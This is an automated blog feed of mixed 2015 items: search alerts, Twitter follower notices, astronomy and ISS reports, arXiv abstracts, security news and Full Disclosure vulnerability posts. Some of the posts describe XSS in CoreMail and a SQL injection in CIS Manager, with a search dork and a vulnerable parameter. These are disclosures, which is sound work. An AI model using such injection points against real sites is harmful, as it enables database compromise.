Latest YouTube Video

Saturday, November 28, 2015

Make Anonymous Grading notification in Grades section a Feature Option

I can understand in certain situations it is good to know your grade was given in an anonymous setting. I can also see how that information would be ...

from Google Alert - anonymous http://ift.tt/1RdOz2M
via IFTTT

I have a new follower on Twitter


Marcus Biel
Software Craftsman, Trainer, Speaker, Clean Code Activist, Java addict. #refugeeswelcome
Munich, Germany
https://t.co/ozscglwSVn
Following: 3010 - Followers: 12034

November 28, 2015 at 10:27AM via Twitter http://twitter.com/MarcusBiel

[FD] Visual Paradigm Server v10.0 - Cross Site Scripting (XSS)

================================================================ Visual Paradigm Server v10.0 - Cross Site Scripting (XSS) ================================================================ Information

Source: Gmail -> IFTTT-> Blogger

Re: [FD] Google Translator affected by Cross-Site Scripting vulnerability

Hi Francisco, Unfortunately your disclosure is factually wrong. Please note that even the packet you are citing says "Host: translate.googleusercontent.com" - this is not the same domain as translate.google.es (or translate.google.com), therefore, due to the JavaScript same-origin policy ( http://ift.tt/1k9Orkx) it's a different origin. Which means that scripts executed from translate.googleusercontent.com do not have access to cookies/DOM/etc of Google Translate main domains (translate.google.es, etc). And there are no interesting cookies / things to do on translate.googleusercontent.com. Given the above, as Google surely told you, you didn't find an XSS in Google Translate, you found an XSS in a sandbox domain, which was designed to allow execution of potentially hostile JavaScript code. Hey, you even can find the *.googleusercontent.com domain in Google's sandboxed domain listing: http://ift.tt/1IfJnK3 Keep in mind that when doing XSS-related security research a popping out alert box tells you that you can execute code, but not if it's a vulnerability - for that you need to verify the domain (and maybe schema/port as well, depending on your case), e.g. by doing alert(document.domain) instead of alert('XSS en Google AUDIT') ;) Cheers, Gynvael On Fri, Nov 27, 2015 at 10:28 AM Francisco Javier Santiago Vázquez < franciscojaviersantiagovazquez@gmail.com> wrote: > I. VULNERABILITY >

Source: Gmail -> IFTTT-> Blogger

[FD] BlackArch Linux: New ISOs and Guide released

Gravity's Grin


Albert Einstein's general theory of relativity, published 100 years ago this month, predicted the phenomenon of gravitational lensing. And that's what gives these distant galaxies such a whimsical appearance, seen through the looking glass of X-ray and optical image data from the Chandra and Hubble space telescopes. Nicknamed the Cheshire Cat galaxy group, the group's two large elliptical galaxies are suggestively framed by arcs. The arcs are optical images of distant background galaxies lensed by the foreground group's total distribution of gravitational mass dominated by dark matter. In fact the two large elliptical "eye" galaxies represent the brightest members of their own galaxy groups which are merging. Their relative collisional speed of nearly 1,350 kilometers/second heats gas to millions of degrees producing the X-ray glow shown in purple hues. Curiouser about galaxy group mergers? The Cheshire Cat group grins in the constellation Ursa Major, some 4.6 billion light-years away. via NASA http://ift.tt/1HskNFu

Friday, November 27, 2015

Anonymous white

... Dictionaries & Language Packs · Search Tools · Developer Hub · Add-ons for Firefox · Themes; Anonymous white. Anonymous white. by Randy ...

from Google Alert - anonymous http://ift.tt/1SooSeq
via IFTTT

CDN distribution does an anonymous define in AMD environments, causing errors

CDN distribution does an anonymous define in AMD environments, causing errors #92. Open. nicolasv opened this Issue an hour ago · 1 comment ...

from Google Alert - anonymous http://ift.tt/1NztHna
via IFTTT

Anonymous: 'Sto core mio se fusse de diamante

News · Frequently Asked Questions · Home · Lasso et al.: Canzoni villanesche and Villanelle; Anonymous: 'Sto core mio se fusse de diamante ...

from Google Alert - anonymous http://ift.tt/1PhfFH6
via IFTTT

I have a new follower on Twitter


MyNewNFLJerseyfetish
The three bird mascots of the Baltimore Ravens are named Edgar, Allan and Poe. Tap the Hyperlink below to get your favored NFL Jersey This Second.
Angleton, TX
https://t.co/60zkfE6Knq
Following: 2752 - Followers: 1017

November 27, 2015 at 02:08PM via Twitter http://twitter.com/MyNewNFLJersey

I have a new follower on Twitter


FredLandis
Cloud Alliance Marketer and Strategist

http://t.co/SNVDzhMM4N
Following: 6529 - Followers: 7428

November 27, 2015 at 01:06PM via Twitter http://twitter.com/flandis

I have a new follower on Twitter


Thom Wall
Former geek enabler, but now realised am infact a Geek! Replica Prop & Costume Artist, Cosplayer, Events Organizer, Cat and Dinosaur enthusiast.
Glasgow
http://t.co/sUVolCoO3T
Following: 3008 - Followers: 4952

November 27, 2015 at 01:06PM via Twitter http://twitter.com/SorenzoProps

Ravens: A lot has changed since Dec. 30, 2007, the last time a QB not named Joe Flacco started for Baltimore - Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Anonymous jobs

View details & apply online for jobs at Anonymous. Find your ideal job on reed.co.uk, the UK's #1 job site.

from Google Alert - anonymous http://ift.tt/1kXmQaz
via IFTTT

Millions of IoT Devices Using Same Hard-Coded CRYPTO Keys

Millions of embedded devices, including home routers, modems, IP cameras, VoIP phones, are shareing the same hard-coded SSH (Secure Shell) cryptographic keys or HTTPS (HTTP Secure) server certificates that expose them to various types of malicious attacks. A new analysis by IT security consultancy SEC Consult shows that the lazy manufacturers of the Internet of Things (IoTs) and Home


from The Hacker News http://ift.tt/1kXf5Sa
via IFTTT

ISS Daily Summary Report – 11/25/15

Robonaut 2 Troubleshooting:   Lindgren continued troubleshooting Robonaut’s Compact Peripheral Component Interface today.    Robonaut 2 is a two-armed humanoid robot designed with the versatility and dexterity to manipulate hardware, work in high risk environments, and respond safely to unexpected obstacles. Robonaut is currently mounted inside the ISS.  In the future, it will perform tasks both inside and outside the ISS.   Veggie (Veg-01):  Kelly refilled the Veg-01 plant pillows with water.  The Veg-01 investigation is used to assess on-orbit function and performance of the Veggie facility, focusing on the growth and development of seedlings in the spaceflight environment and the composition of microbial flora on the plants and the facility.  For this run, Zinnias will be grown for 60 days and are expected to produce flowers.   Biological Rhythms 48 Hours:  At the end of his work day Lindgren removed the Holter Electrocardiogram and transfered data from the Holter and Acitwatch to the Medical laptop.  This investigation studies the effects of long-term microgravity exposure on heart function by analyzing an astronaut’s electrocardiogram for 48 hours. While the ISS schedule follows Greenwich Mean Time (GMT), it is not known whether a separate biological rhythm is imposed on long-term flight crews. To study this, astronauts wear an Actiwatch for 96 hours and a Holter electrocardiograph for 48 hours.   Haptics-1:  Yui set up equipment and performed experiment protocols for the rack-mounted configuration of European Space Agency’s (ESA’s) Haptics-1 investigation. The Haptics-1 experiment is performed in two different configurations to evaluate hardware and human performance under varying mounting conditions: wall-mounted on rack seat tracks and body-mounted in a vest assembly.  Haptics-1 supports analysis of engineering parameters and the merits of body-grounded versus non-body grounded force feedback to a crewmember within a microgravity environment.  The physiological property analysis will identify changes in human kinesthetic perception and performance in position and force-torque control tasks and in cognitive performance.   Mouse Habitat Unit (MHU):  Yui installed the spare MHU Interface Unit in the Cell Biology Experiment Facility (CBEF) for checkout.  He then installed spare MHU cages into the CBEF for a ground commanded checkout.   Cognition:  Kornienko performed his Flight Day 233 session of the Cognition experiment today.  The Individualized Real-Time Neurocognitive Assessment Toolkit for Space Flight Fatigue (Cognition) investigation is a battery of tests that measure how spaceflight-related physical changes, such as microgravity and lack of sleep, can affect cognitive performance. Cognition includes ten brief computerized tests that cover a wide range of cognitive functions, and provides immediate feedback on current and past test results. The software used allows for real-time measurement of cognitive performance while in space.   44 Soyuz (44S) Emergency Egress Drill:  The 44S Crew (Kelly, Volkov, and Kornienko) participated in an emergency decent drill.  This training session focuses on off-nominal procedures that would be used in the event the crew needs to egress the ISS and perform an emergency descent.  The drill is scheduled when the crew has been aboard the ISS for 12-14 weeks, then once every 2.5 months.   Port Thermal Radiator Rotary Joint (TRRJ) Survey:  Kelly configured a D4 Camera in order to perform a periodic imagery survey of the port TRRJ from the Docking Compartment 1 window. During this task, the Radiator was rotated to two different angles to photograph both sides of the TRRJ. This survey is conducted yearly for data gathering purposes.   ISS Reboost: This afternoon the ISS performed a reboost using 61 Progress (61P) thrusters.  Delta-V was 1.946 meters/second, burn duration was 15 minutes 32.8 seconds. This reboost sets up conditions for the 43S landing on December 11 and the 45S 4-orbit rendezvous on December 15.   Today’s Planned Activities All activities were completed unless otherwise noted. Body Mass Measurement МО-8. Closeout Ops Ultrasound 2 – Hardware Activation Soyuz 718 Samsung Tablet Charge – start SSIPC FD Conference Ultrasound 2 – Scanning Verification of ИП-1 Flow Sensor Position Private Psychological Conference Water Recovery System (WRS) Drain Waste Water Tank, initiate CBEF – Hardware Setup Ultrasound 2 – Data Export Recording Greetings Video Ultrasound 2 – Closeout Ops On-board Training (OBT) Cygnus Rendezvous Review [Aborted] BIOCARD. Experiment Ops Water Recovery System (WRS) Drain Waste Water Tank, terminate HRF – Hardware Setup HAP1 – Activation HAM radio session from Columbus [Aborted] HAP1 Experiment Ultrasound 2 – Deactivation and Stowage ISS Emergency Descent OBT Surface sampling from FGB equipment and structures HAP1 Photography Eye Examination HAP1 Experiment TV Conference with Students and Teachers of Know-How Language Center Robonaut Node2 Camcorder Video Setup Setup camcorder in Lab for Robonaut VEG-01 – Refilling Root Mat with Water Preventive Maintenance of FS1 Laptop (Cleaning and rebooting) СОЖ Maintenance Surface samples from FGB equipment and structures R2 Experiment BRI Cleaning Private Psychological Conference HAP1 Experiment Video Footage for Roscosmos TV Studio Photo Camera Setup for Radiator Inspection P1 Radiator Imagery from DC1 window, Part 1 HAP1 – Hardware Stowage Download Photos and Return Camera to Nominal Setup Configuration ARED Quarterly Maintenance HMS – OCT Hardware Stow IMS Delta File Prep Soyuz 718 Samsung tablet charging – end SPRINT Exercise NAPOR-miniRSA. Cleaning БЗУ-М vents Closing USOS Window Shutters Closing window 6,8,9,12,13,14 shutters R2 – Hardware Deactivation and Stowage CONTENT. Experiment Ops BLR48 – Saving Experiment Data Evening Work Prep WRS – Recycle Tank Fill BLR48 – Saving Actiwatch Data COGNITION – Experiment Ops Preparation of Reports for Roscosmos Web Site and Social Media ECON-M. Observations and Photography URAGAN Observations and Photography Installation of inserts to ease opening of SM interior panel locks   Completed Task List Items LHA JPM1OF3 R&R   Ground Activities All activities were completed unless otherwise noted. ISS Reboost   Three-Day Look Ahead: Thursday, 11/26: Crew Holiday Friday, 11/27:  RRM Transfer Cage Install, HAPTICS-1 Ops, Crew Departure Prep, Stbd CQ Cleaning, IMAX File D/L Saturday, 11/28:  Weekly Cleaning, Crew Off Duty   QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab […]

from ISS On-Orbit Status Report http://ift.tt/1LDhc2s
via IFTTT

Critical 'Port Fail' Vulnerability Reveals Real IP Addresses of VPN Users

A newly discovered flaw affecting all VPN protocols and operating systems has the capability to reveal the real IP-addresses of users' computers, including BitTorrent users, with relative ease. The vulnerability, dubbed Port Fail by VPN provider Perfect Privacy (PP) who discovered the issue, is a simple port forwarding trick and affects those services that: Allow port forwarding Have no


from The Hacker News http://ift.tt/1lkZUBE
via IFTTT

[FD] PRTG Network Monitor Tool – Multiple Cross-Site Scripting Vulnerability

================================================================ PRTG Network Monitor Tool – Multiple Cross-Site Scripting Vulnerability ================================================================ Information

Source: Gmail -> IFTTT-> Blogger

[FD] Mitigations for "carpet bombing" alias "directory poisoning" attacks against executable installers

ISIS page hacked, replaced with Viagra ad. Anonymous group hopes Islamic State will rise up and ...

Undoubtedly, the amount of be-headings is bound plummet now! I believe the average farker could deliver a better laugh line than anonymous.

from Google Alert - anonymous http://ift.tt/1lkXFhL
via IFTTT

[FD] [CVE-2015-6942] CoreMail XT3.0 Stored XSS

Application: CoreMail Versions Affected: XT3.0 Vendor URL: http://www.coremail.cn/ Bugs: Stored XSS Author:shack.li(DBAPPSecurity Ltd) Description: Coremail mail system was born in 1999, is widely used in network operators, large enterprises, government institutions, colleges and universities and other mail systems, so far, the user has more than 700000000,the official website. Create a document, insert a hyperlink, hyperlink for executing the JavaScript test code "javascript:alert ()". Then create a mail and upload attachments, and then send them to the other users who need them. When other users online preview documents, click the hyperlink, Attack code will be executed step one: step two:

Source: Gmail -> IFTTT-> Blogger

[FD] Google Translator affected by Cross-Site Scripting vulnerability

I. VULNERABILITY

Source: Gmail -> IFTTT-> Blogger

How to Root Windows Phone and Unlock the Bootloader to Install Custom ROMs

Yes, Now it is possible to unlock a Windows Lumia Phone for Root Access and run custom ROMs. Both Microsoft as well as Nokia have made Windows Lumia smartphones difficult to break into at a low-level by locking down their bootloaders, but a software hacker, who go by the name HeathCliff, has just proven that it is not impossible. HeathCliff has released an excellent tool called "


from The Hacker News http://ift.tt/1Yxdoc5
via IFTTT

Planets of the Morning


Planet Earth's horizon stretches across this recent Solar System group portrait, seen from the southern hemisphere's Las Campanas Observatory. Taken before dawn it traces the ecliptic with a line-up familiar to November's early morning risers. Toward the east are bright planets Venus, Mars, and Jupiter as well as Regulus, alpha star of the constellation Leo. Of course the planets are immersed in the faint glow of zodiacal light, visible from the dark site rising at an angle from the horizon. Sometimes known as the false dawn, it's no accident the zodiacal light and planets both lie along the ecliptic. Formed in the flattened protoplanetary disk, the Solar System's planet's all orbit near the ecliptic plane, while dust near the plane scatters sunlight, the source of the faint zodiacal glow. via NASA http://ift.tt/1NvB8f9

Thursday, November 26, 2015

'Swede' Hanson impacted thousands of lives but stayed largely anonymous

Over and over, he poured coffee and spoke at countless Alcoholics Anonymous meetings he started, led or attended in southern Colorado.

from Google Alert - anonymous http://ift.tt/1OjqvLa
via IFTTT

Anonymous

Anonymous. 1800092 likes · 21125 talking about this. We are Anonymous, We are Legion. We do not forgive. We do not forget. Expect us.

from Google Alert - anonymous http://ift.tt/1MGOVfi
via IFTTT

Ocean City, MD's surf is at least 5.32ft high

Maryland-Delaware, December 01, 2015 at 08:00AM

Ocean City, MD Summary
At 2:00 AM, surf min of 4.92ft. At 8:00 AM, surf min of 5.32ft. At 2:00 PM, surf min of 3.2ft. At 8:00 PM, surf min of 3.28ft.

Surf maximum: 5.78ft (1.76m)
Surf minimum: 5.32ft (1.62m)
Tide height: 1.62ft (0.49m)
Wind direction: ESE
Wind speed: 9.17 KTS


from Surfline http://ift.tt/1kVmigH
via IFTTT

Anonymous Reporting

To facilitate the anonymous reporting, American AgCredit has engaged a third party vendor, EthicsPoint a division of NAVEX Global, to facilitate the ...

from Google Alert - anonymous http://ift.tt/1PcAu6t
via IFTTT

Live at Santas Anonymous 3

Live at Santas Anonymous 3. ... Ho ho ho! Our Bridget Ryan is impersonating the big guy down at Santas Anonymous with a lot of other good people.

from Google Alert - anonymous http://ift.tt/1OtBvUv
via IFTTT

Anonymous hacks Isis, replaces propaganda with drugs ads

Anonymous hacks Isis, replaces propaganda with drugs ads. The hackers have taken down a site on the darkweb and replaced its homepage with a ...

from Google Alert - anonymous http://ift.tt/1PcpINt
via IFTTT

Li-Fi is 100 times Faster than Wi-Fi Technology: Real-World Tests Prove

Yes, it's time to shift from Wi-Fi to Li-Fi — an alternative technology that is 100 times faster than the average speeds of Wi-Fi. Scientists have just field-tested the new wireless technology called Li-Fi for the first time and achieved marvelous wireless speeds that are 100 times faster than current WiFi speeds. What is Li-Fi Technology? Li-Fi is a new wireless technology that


from The Hacker News http://ift.tt/1N9L47v
via IFTTT

Raspberry Pi Zero — The $5 Tiny Computer is Here

Get ready for a ThanksGiving celebration from the Raspberry Pi Foundation. Raspberry Pi, the charitable foundation behind the United Kingdom's best-selling computer, has just unveiled its latest wonder – the Raspberry Pi Zero. Raspberry Pi Zero is a programmable computer that costs just $5 (or £4), may rank as the world's cheapest computer. <!-- adsense --> Raspberry Pi Zero: Just $5


from The Hacker News http://ift.tt/1Ij5QR8
via IFTTT

Hackers are using Nuclear Exploit Kit to Spread Cryptowall 4.0 Ransomware

Beware Internet Users! Cryptowall 4.0 – the newest version of the world's worst Ransomware – has surfaced in the Nuclear exploit kit, one of the most potent exploit kits available in the underground market for hacking into computers. Ransomware threat has emerged as one of the biggest threats to internet users in recent times. Typically, a Ransomware malware encrypts all files on


from The Hacker News http://ift.tt/1Xi29aw
via IFTTT

Mr. Grey Hacker (Wanted by FBI) Steals 1.2 BILLION Login Passwords

That's a lot of Login credentials fetch by a single hacker. The FBI believes a single hacker who goes by the moniker Mr.Grey has stolen login credentials for over 1.2 Billion online accounts – apparently the biggest heist of log-in credentials the FBI has investigated thus far. Yeah, that's not Fifty, but 1.2 Billion Shades of Grey. <!-- adsense --> The information came from the court


from The Hacker News http://ift.tt/1jkYhCG
via IFTTT

Unusual Pits Discovered on Pluto


Why are there unusual pits on Pluto? The indentations were discovered during the New Horizons spacecraft's flyby of the dwarf planet in July. The largest pits span a kilometer across and dip tens of meters into a lake of frozen nitrogen, a lake that sprawls across Sputnik Planum, part of the famous light-colored heart-shaped region named Tombaugh Regio. Although most pits in the Solar System are created by impact craters, these depressions look different -- many are similarly sized, densely packed, and aligned. Rather, it is thought that something has caused these specific areas of ice to sublimate and evaporate away. In fact, the lack of overlying impact craters indicates these pits formed relatively recently. Even though the robotic New Horizons is now off to a new destination, it continues to beam back to Earth new images and data from its dramatic encounter with Pluto. via NASA http://ift.tt/1QHXIRV

Wednesday, November 25, 2015

Live at Santas Anonymous 2

Ho ho ho! Our Bridget Ryan is impersonating the big guy down at Santas Anonymous with a lot of other good people.

from Google Alert - anonymous http://ift.tt/1NQ59k4
via IFTTT

I have a new follower on Twitter


Shinedowns Nation
Shinedowns Nation - A @Shinedown Fan Page. New album 'Threat To Survival' is out now! Get your copy here: https://t.co/uHsbb4qPYZ
Shinedown Nation
http://t.co/rS31qutFo0
Following: 117126 - Followers: 115226

November 25, 2015 at 11:52PM via Twitter http://twitter.com/Shinedown_Fans

Learning with Memory Embeddings. (arXiv:1511.07972v1 [cs.AI])

Embedding learning, a.k.a. representation learning, has been shown to be able to model large-scale semantic knowledge graphs. A key concept is a mapping of the knowledge graph to a tensor representation whose entries are predicted by models using latent representations of generalized entities. In recent publications the embedding models were extended to also consider temporal evolutions, temporal patterns and subsymbolic representations. These extended models were used successfully to predict clinical events like procedures, lab measurements, and diagnoses. In this paper, we attempt to map these embedding models, which were developed purely as solutions to technical problems, to various cognitive memory functions, in particular to semantic and concept memory, episodic memory and sensory memory. We also make an analogy between a predictive model, which uses entity representations derived in memory models, to working memory. Cognitive memory functions are typically classified as long-term or short-term memory, where long-term memory has the subcategories declarative memory and non-declarative memory and the short term memory has the subcategories sensory memory and working memory. There is evidence that these main cognitive categories are partially dissociated from one another in the brain, as expressed in their differential sensitivity to brain damage. However, there is also evidence indicating that the different memory functions are not mutually independent. A hypothesis that arises out off this work is that mutual information exchange can be achieved by sharing or coupling of distributed latent representations of entities across different memory functions.



from cs.AI updates on arXiv.org http://ift.tt/1NdF4iH
via IFTTT

Strategic Dialogue Management via Deep Reinforcement Learning. (arXiv:1511.08099v1 [cs.AI])

Artificially intelligent agents equipped with strategic skills that can negotiate during their interactions with other natural or artificial agents are still underdeveloped. This paper describes a successful application of Deep Reinforcement Learning (DRL) for training intelligent agents with strategic conversational skills, in a situated dialogue setting. Previous studies have modelled the behaviour of strategic agents using supervised learning and traditional reinforcement learning techniques, the latter using tabular representations or learning with linear function approximation. In this study, we apply DRL with a high-dimensional state space to the strategic board game of Settlers of Catan---where players can offer resources in exchange for others and they can also reply to offers made by other players. Our experimental results report that the DRL-based learnt policies significantly outperformed several baselines including random, rule-based, and supervised-based behaviours. The DRL-based policy has a 53% win rate versus 3 automated players (`bots'), whereas a supervised player trained on a dialogue corpus in this setting achieved only 27%, versus the same 3 bots. This result supports the claim that DRL is a promising framework for training dialogue systems, and strategic agents with negotiation abilities.



from cs.AI updates on arXiv.org http://ift.tt/1T5BkzT
via IFTTT

A Roadmap towards Machine Intelligence. (arXiv:1511.08130v1 [cs.AI])

The development of intelligent machines is one of the biggest unsolved challenges in computer science. In this paper, we propose some fundamental properties these machines should have, focusing in particular on communication and learning. We discuss a simple environment that could be used to incrementally teach a machine the basics of natural-language-based communication, as a prerequisite to more complex interaction with human users. We also present some conjectures on the sort of algorithms the machine should support in order to profitably learn from the environment.



from cs.AI updates on arXiv.org http://ift.tt/1T5BmI2
via IFTTT

Improving Decision Trees Using Tsallis Entropy. (arXiv:1511.08136v1 [stat.ML])

The construction of efficient and effective decision trees remains a key topic in machine learning because of their simplicity and flexibility. A lot of heuristic algorithms have been proposed to construct near-optimal decision trees. Most of them, however, are greedy algorithms which have the drawback of obtaining only local optimums. Besides, common split criteria, e.g. Shannon entropy, Gain Ratio and Gini index, are also not flexible due to lack of adjustable parameters on data sets. To address the above issues, we propose a series of novel methods using Tsallis entropy in this paper. Firstly, a Tsallis Entropy Criterion (TEC) algorithm is proposed to unify Shannon entropy, Gain Ratio and Gini index, which generalizes the split criteria of decision trees. Secondly, we propose a Tsallis Entropy Information Metric (TEIM) algorithm for efficient construction of decision trees. The TEIM algorithm takes advantages of the adaptability of Tsallis conditional entropy and the reducing greediness ability of two-stage approach. Experimental results on UCI data sets indicate that the TEC algorithm achieves statistically significant improvement over the classical algorithms, and that the TEIM algorithm yields significantly better decision trees in both classification accuracy and tree complexity.



from cs.AI updates on arXiv.org http://ift.tt/1R7ieuG
via IFTTT

Plan Explainability and Predictability for Cobots. (arXiv:1511.08158v1 [cs.AI])

Robots are becoming pervasive in human populated environments. A desirable capability of these robots (cobots) is to respond to goal-oriented commands by autonomously constructing plans. However, such autonomy can add significant cognitive load and even potentially introduce safety risks to the humans when robots choose their plans unexpectedly. As a result, for cobots to be more helpful, one important requirement is for them to synthesize plans that do not {\it surprise} the humans. While there are previous works that studied socially acceptable robots which discuss ``natural ways'' for cobots to interact with humans, there still lacks a general solution, especially for cobots that can construct their own plans. In this paper, we introduce the notions of plan {\it explainability} and {\it predictability}. To compute these measures, first, we postulate that humans understand robot plans by associating high level tasks with robot actions, which can be considered as a labeling process. We learn the labeling scheme of humans for robot plans from training examples using conditional random fields (CRFs). Then, we use the learned model to label a new plan to compute its explainability and predictability. These measures can be used by cobots to proactively choose plans, or directly incorporated into the planning process to generate plans that are more explainable and predictable. We provide an evaluation on a synthetic dataset to demonstrate the effectiveness of our approach.



from cs.AI updates on arXiv.org http://ift.tt/1XgW5iu
via IFTTT

Building End-To-End Dialogue Systems Using Generative Hierarchical Neural Network Models. (arXiv:1507.04808v2 [cs.CL] UPDATED)

We investigate the task of building open domain, conversational dialogue systems based on large dialogue corpora using generative models. Generative models produce system responses that are autonomously generated word-by-word, opening up the possibility for realistic, flexible interactions. In support of this goal, we extend the recently proposed hierarchical recurrent encoder-decoder neural network to the dialogue domain, and demonstrate that this model is competitive with state-of-the-art neural language models and back-off n-gram models. We investigate the limitations of this and similar approaches, and show how its performance can be improved by bootstrapping the learning from a larger question-answer pair corpus and from pretrained word embeddings.



from cs.AI updates on arXiv.org http://ift.tt/1ea3dHX
via IFTTT

Identification by Auxiliary Instrumental Sets in Linear Structural Equation Models. (arXiv:1511.02995v2 [stat.ME] CROSS LISTED)

We extend graph-based identification methods for linear models by allowing background knowledge in the form of externally evaluated parameters. Such information could be obtained, for example, from a previously conducted randomized experiment, from substantive understanding of the domain, or even from another identification technique. To incorporate such information systematically, we propose the addition of auxiliary variables to the model, which are constructed so that certain paths will be conveniently cancelled. This cancellation allows the auxiliary variables to help conventional methods of identification (e.g., single-door criterion, instrumental variables, half-trek criterion) and model testing (e.g., d-separation, over-identification). Moreover, by iteratively alternating steps of identification and adding auxiliary variables, we can improve the power of existing identification and model testing methods, even without additional knowledge. We operationalize this general approach for instrumental sets (a generalization of instrumental variables) and show that the resulting procedure subsumes the most general identification method for linear systems known to date. We further discuss the application of this new operation in the tasks of model testing and z-identification.



from cs.AI updates on arXiv.org http://ift.tt/1OD10FS
via IFTTT

[anonymous_publishing] Anonymous publishing

Summary Anonymous publishing may lower the threshold for authorship and entry to a site. It may also be an requirement for certain sites that deal ...

from Google Alert - anonymous http://ift.tt/1IhwTMC
via IFTTT

Anonymous resident pays for firefighters' groceries

VANDALIA, Ohio Firefighters who had to leave a grocery store for a medical call came back to find someone had paid for their groceries.

from Google Alert - anonymous http://ift.tt/1HnQ50m
via IFTTT

I have a new follower on Twitter


RANN

Brooklyn, NY
https://t.co/tgpQ1hGX6R
Following: 3915 - Followers: 3118

November 25, 2015 at 02:25PM via Twitter http://twitter.com/rannpage

"Anonymous" Could Derail Government Attempts to Target ISIS

Anonymous is one such group whose level of public support continues to climb ... Affectionately labeled “hacktivists,” Anonymous strives to uncover ...

from Google Alert - anonymous http://ift.tt/1SkNapJ
via IFTTT

Chile FF president in Miami after resigning amid FIFA probe

SANTIAGO, Chile (AP) The whereabouts of the former president of Chile's soccer federation has been solved.

from FOX Sports Digital http://ift.tt/1OgGFoK
via IFTTT

[FD] CIS Manager Content Management System 2015Q4 - SQL Injection Vulnerability

Document Title: =============== CIS Manager Content Management System 2015Q4 - SQL Injection Vulnerability References (Source): ==================== http://ift.tt/21fTlBj Release Date: ============= 2015-11-25 Vulnerability Laboratory ID (VL-ID): ==================================== 1652 Common Vulnerability Scoring System: ==================================== 8.3 Product & Service Introduction: =============================== The Constructive Internet Software through a team of qualified professionals have skills to offer the best solution for your company in the digital world. Check the main services offered. Consulting and planning of actions and projects using digital technologies and media oriented Internet (websites, portals, e-commerce, web-based systems), mobile technology (mobile), social networking and search engine marketing. We seek the desired result by our customers, through a detailed and accurate survey of requirements. Architecture, design and development of applications and systems using web and mobile technologies seeking to meet the precise planning of digital actions. Learn about the technologies that are in our abilities. (Copy of the Vendor Homepage: http://ift.tt/1IgEz1z ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered a remote sql injection web vulnerability in the official CIS Manager Content Management System. Vulnerability Disclosure Timeline: ================================== 2015-11-24: Report to Vulnerability Lab (Sajjad Sotoudeh - White-hg) 2015-11-25: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Construtiva Product: CIS Manager - Content Management System (Web-Application) 2015 Q4 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A remote sql injection web vulnerability has been discovered in the official CIS Content Management System 2015-Q4. The vulnerability allows remote attackers to execute own sql commands to compromise the web-applicaation or connected dbms. The vulnerability is located in the `TroncoID` value of the `default.php` file. Remote attackers are able to execute own sql commands by manipulation of the GET method request with the vulnerable TroncoID parameter. The request method to inject the sql command is GET and the issue is located on the application-side of the `./site/` online-service path. The sql vulnerability allows remote attackers to compromise the database management system that is connected to the web-application. The issue is a classic order-by sql injection issue. The security risk of the sql injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.3. Exploitation of the remote sql injection web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise. Request Method(s): [+] GET Vulnerable Module(s): [+] ./site/ Vulnerable File(s): [+] default.asp Vulnerable Parameter(s): [+] TroncoID Proof of Concept (PoC): ======================= The sql-injection web vulnerability can be exploited by remote attackers without privileged web-application user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Dork(s): intext:"Powered by CIS Manager" PoC: http://localhost:8000/site/default.asp?TroncoID=[SQL-INJECTION VULNERABILITY!] Security Risk: ============== The security risk of the remote sql injection web vulnerability in the id parameter value is estimated as high. (CVSS 8.3) Credits & Authors: ================== Sajjad Sotoudeh - (http://www.y-r-s.net & www.white-hg.com) [http://ift.tt/21fTlBl] We are: KamraN HellisH - Dr.RooT - Dr.Repermind - Milad_Inj3ct0r - 4li-3ndG & All white-hg members Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - http://ift.tt/1zNuo47 - http://ift.tt/1wo6y8x Social: http://twitter.com/#!/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1kouSqp Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source: Gmail -> IFTTT-> Blogger

Anonymous declares cyber war on ISIS

The hacker activist group Anonymous vows to destroy ISIS propaganda and prevent future terrorist attacks.

from Google Alert - anonymous http://ift.tt/1HmV1m1
via IFTTT

Russian ATM Hackers Steal $4 Million in Cash with 'Reverse ATM Hack' Technique

Russian hackers have discovered a novel technique to rip off Millions of dollars from banks and ATMs. Criminals in Russia used a technique, called “Reverse ATM Attack,” and stole 252 Million Rubles (US$3.8 Million) from at least five different banks, according to the information obtained by Russian digital intelligence firm Group-IB. What is Reverse ATM Attack? According to the


from The Hacker News http://ift.tt/1IgqRfg
via IFTTT

ISS Daily Summary Report – 11/24/15

